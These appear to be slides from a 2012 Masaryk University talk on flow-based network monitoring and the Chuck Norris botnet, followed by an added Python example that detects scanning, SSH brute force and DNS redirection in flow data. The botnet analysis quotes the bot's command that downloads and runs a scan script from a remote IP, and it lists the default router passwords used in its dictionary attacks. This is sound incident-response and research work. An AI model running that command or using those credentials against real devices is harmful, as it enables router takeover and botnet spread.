Army & Academia Cyber Security Research in Czech Republic
Jan Vykopal
Institute of Computer Science, Masaryk University, Brno, Czech Republic
vykopal@ics.muni.cz
October 18, 2012, Manama, Bahrain

Part I: Masaryk University, Brno, Czech Republic

Brno, Czech Republic
- 2nd largest city (after Prague).
- ~400,000 inhabitants, ~100,000 students.
- Home to a number of institutions directly involved in R&D (AVG, IBM, Honeywell).

Masaryk University
- 2nd largest university in the country.
- ~45,000 students, ~5,000 staff.
- ~15,000 hosts online every day.
- 2x 10 gigabit uplinks to the Internet.

Part II: R&D Timeline

Before 2008
- 2004: Czech NREN CESNET, Masaryk University and Brno University of Technology built the first 10 gigabit network interface card in the academic world.
- 2005-2007: first two university spin-off companies established.
- 2007: CAMNEP project (Cooperative Adaptive Mechanism for Network Protection) for the U.S. Army.

Since 2008
- 2008: CYBER project for the Czech Army started.
- 2008-2009: CAMNEP project follow-up.
- 2009: CSIRT-MU, the Computer Security Incident Response Team of Masaryk University, established.
- 2010: a new botnet, named Chuck Norris, discovered.
- 2011: cooperation with the Czech National Security Authority, which operates the Czech governmental CERT.

Part III: Network Security Monitoring at Masaryk University

FlowMon Probes at Masaryk University Campus
[Figure: 1/10 GE FlowMon probes deployed across the campus. The probes perform NetFlow data acquisition, a collector performs NetFlow data collection, and NetFlow data analyses run on top of the collector.]

[Figure: a network without any flow monitoring system.]
[Figure: a FlowMon probe connected to an in-line TAP. The FlowMon probe observes data from TAP and SPAN ports.]

- NfSen - NetFlow Sensor - http://nfsen.sf.net/
- NFDUMP - NetFlow display - http://nfdump.sf.net/

Part IV: CYBER project

- Validation of advanced probe utilization in active network protection.
- Analysis of up-to-date network threats and protection against them.
- Automatic reaction to security threats.
- Deployment of project results in real networks by the CIRC of the Czech Ministry of Defence and by CSIRT-MU.

- Detection of SSH/RDP dictionary attacks.
- Detection of infiltrated devices in the network.

Active network protection
- blocking
- filtering
- limiting
- (phishing) quarantine
- counterattack

Features
- Traffic distribution among multiple CPU cores.
- Network applications with hardware acceleration.
- Capable of concurrent monitoring/blocking/filtering/etc.

[Figure: HAMOC architecture. NetFlow and DPI modules feed a Control Module, which separates malicious traffic from legitimate traffic.]

Part V: Chuck Norris Botnet

What is "new"?
- Attack against network devices.
- Users are not aware of the attack.
- Infected devices are permanently connected to the Internet.

Short Summary
- Attacks Linux MIPSEL devices (ADSL modems, WiFi routers).
- No anti-* solution available for such devices.
- Access to all of the user's traffic.
- Based on known techniques and components.

Botnet Analysis - I
[Figure: botnet monitoring and analysis testbed, with an ASUS WL500gP router used as an agent-provocateur.]
[Figure: the infected device receives a list of class C networks to scan.]

Tab. 1: Example of botnet propagation targets.

IP Range          Owner
217.236.0.0/16    Deutsche Telekom
88.253.0.0/16     TurkTelekom
87.22.0.0/16      Telecom Italia
220.240.0.0/16    Comindico Australia
85.174.0.0/16     Volgograd Electro Svyaz
222.215.0.0/16    China Telecom
201.1.0.0/16      Telecomunicacoes de Sao Paulo
200.121.0.0/16    Telefonica del Peru

Propagation
1. The infected device runs a dictionary attack against the victim's TELNET service.
2. The victim downloads the current bot version and becomes an infected device.
3. The bot denies remote access to the infected device (ports 22-80).

Tab. 2: Passwords used for the dictionary attack.
- admin, Admin, password, root, 1234, private, XAlbacOMX, adsl1234, %%fuckinside%%, dreambox, blank password
- admin: admin, password, blank password
[Figure: the IRC channel topic carries the initial command; the infected device fetches the scan tools from a web server.]

Initial Command (IRC Topic):
:!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh

Botnet Threats
- Denial-of-Service attacks - DoS, DDoS.
- DNS spoofing attack.
- Infected device reconfiguration.

Consequences for Users
- The link is saturated with malicious traffic.
- Economic losses and criminal sanctions against unaware users.

DNS Spoofing Attack
- Web page redirect:
  - www.facebook.com
  - www.google.com
- Malicious code execution.
[Figure: DNS spoofing through the infected router. Elements shown: botnet C&C center, OpenDNS.com, primary and secondary DNS server, infected router, and requests for www.facebook.com and www.linux.org.]

Attacks Against Masaryk University Network
[Figure: Telnet scans against the Masaryk University network per day, 1 Nov to 1 Apr.]
33,000 unique attackers (infected devices) from 2009/10 to 2010/02.
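The CYBER project's detection goals (SSH dictionary attacks, infiltrated devices) and the Chuck Norris behaviour above (mass Telnet scanning, DNS reconfiguration of the router) are all visible in flow data without any payload. The following is an added example, not code from the slides, from FlowMon, NfSen/NFDUMP or the CYBER project: it runs three flow-based detectors over a constructed set of flow records. The simplified CSV layout, the TEST-NET and private addresses, the internal prefix and all thresholds are assumptions chosen for the example.

```python
"""Flow-based detection of the behaviours in the slides: mass Telnet scanning
by infected devices, SSH dictionary attacks and DNS traffic diverted to a
rogue resolver (what a reconfigured home router looks like from the outside).

Added example. Not code from the slides, FlowMon, NfSen/NFDUMP or the CYBER
project; the record layout, sample flows, prefixes and thresholds are assumed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    proto: str
    sport: int
    dport: int
    packets: int
    octets: int
    flags: str  # TCP flags seen in the flow ("S" = SYN only), empty for UDP


def parse_flows(text):
    """Parse 'src,dst,proto,sport,dport,packets,bytes,flags' lines (an assumed,
    simplified CSV export in the spirit of nfdump's CSV output)."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, dst, proto, sport, dport, pkts, octs, flags = [f.strip() for f in line.split(",")]
        flows.append(Flow(src, dst, proto, int(sport), int(dport), int(pkts), int(octs), flags))
    return flows


def telnet_scanners(flows, min_targets=20, max_packets=2):
    """Sources that hit many distinct destinations on TCP/23 with SYN-only
    flows: the propagation pattern of the Chuck Norris bot (Tab. 1 lists the
    scanned ranges). Returns {src: number of distinct targets}."""
    targets = defaultdict(set)
    for f in flows:
        if f.proto == "TCP" and f.dport == 23 and f.packets <= max_packets and "S" in f.flags:
            targets[f.src].add(f.dst)
    return {src: len(t) for src, t in targets.items() if len(t) >= min_targets}


def dictionary_attacks(flows, port=22, min_flows=10, max_packets=30):
    """(src, dst) pairs with many short TCP sessions to one login service.
    Repeated failed logins show up as a burst of small, similar flows, while a
    real admin session is one long flow. Returns {(src, dst): session count}."""
    sessions = defaultdict(int)
    for f in flows:
        if f.proto == "TCP" and f.dport == port and f.packets <= max_packets:
            sessions[(f.src, f.dst)] += 1
    return {pair: n for pair, n in sessions.items() if n >= min_flows}


def rogue_resolvers(flows, internal_prefix, allowed_resolvers):
    """Internal hosts sending DNS to a resolver outside the allowed set: the
    flow-level symptom of the DNS spoofing / device reconfiguration threat.
    Returns {src: sorted list of unexpected resolver addresses}."""
    hits = defaultdict(set)
    for f in flows:
        if f.dport == 53 and f.src.startswith(internal_prefix) and f.dst not in allowed_resolvers:
            hits[f.src].add(f.dst)
    return {src: sorted(dsts) for src, dsts in hits.items()}


def build_sample():
    """Constructed flows (TEST-NET and private addresses, not real traffic)."""
    lines = ["# src,dst,proto,sport,dport,packets,bytes,flags"]
    # 1) one external scanner probing 25 campus hosts on TCP/23, one SYN each
    for i in range(1, 26):
        lines.append(f"192.0.2.5,10.0.1.{i},TCP,{40000 + i},23,1,60,S")
    # 2) 12 short SSH sessions from one source against one server
    for i in range(12):
        lines.append(f"192.0.2.9,10.0.2.10,TCP,{50000 + i},22,14,1800,SAPF")
    # 3) a legitimate long SSH session from inside the campus
    lines.append("10.0.3.3,10.0.2.10,TCP,51000,22,2400,310000,SAPF")
    # 4) DNS: one host uses the campus resolver, one has been pointed elsewhere
    lines.append("10.0.4.20,10.0.0.2,UDP,5353,53,1,72,")
    lines.append("10.0.4.21,198.51.100.1,UDP,5353,53,1,72,")
    return "\n".join(lines)


if __name__ == "__main__":
    flows = parse_flows(build_sample())
    print("Telnet scanners:", telnet_scanners(flows))
    print("Dictionary attacks:", dictionary_attacks(flows))
    print("Rogue resolvers:", rogue_resolvers(flows, "10.", {"10.0.0.2"}))
```

In a real deployment the records would come from the collector instead of build_sample(), and the thresholds are the operational knobs: the packet-count cut-off separates a SYN probe or a failed login from a working session, and the target or session counts set how loud an attacker has to be before the active protection (blocking, filtering, quarantine) is triggered. The rogue-resolver check only needs an allow-list of the resolvers the site actually runs.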
Media
- Czech Ministry of Defence
- Czech Television
- Czech Radio
- New York Times
- Computerworld

Security Community
- 150 alerts sent to abuse mailboxes
- AVG
- Kaspersky Lab
- NATO CIRC
- TF-CSIRT
- Shadowserver.org

In 2011 we spotted a new version in the wild.

Part VI: Conclusion

Conclusion
- Flow-based network intrusion detection and protection is suitable for large and high-speed networks.
- Online network monitoring contributes to overall security.
- Any device connected to the network is potentially dangerous.
- There are no anti-* solutions for ubiquitous networking.

Questions?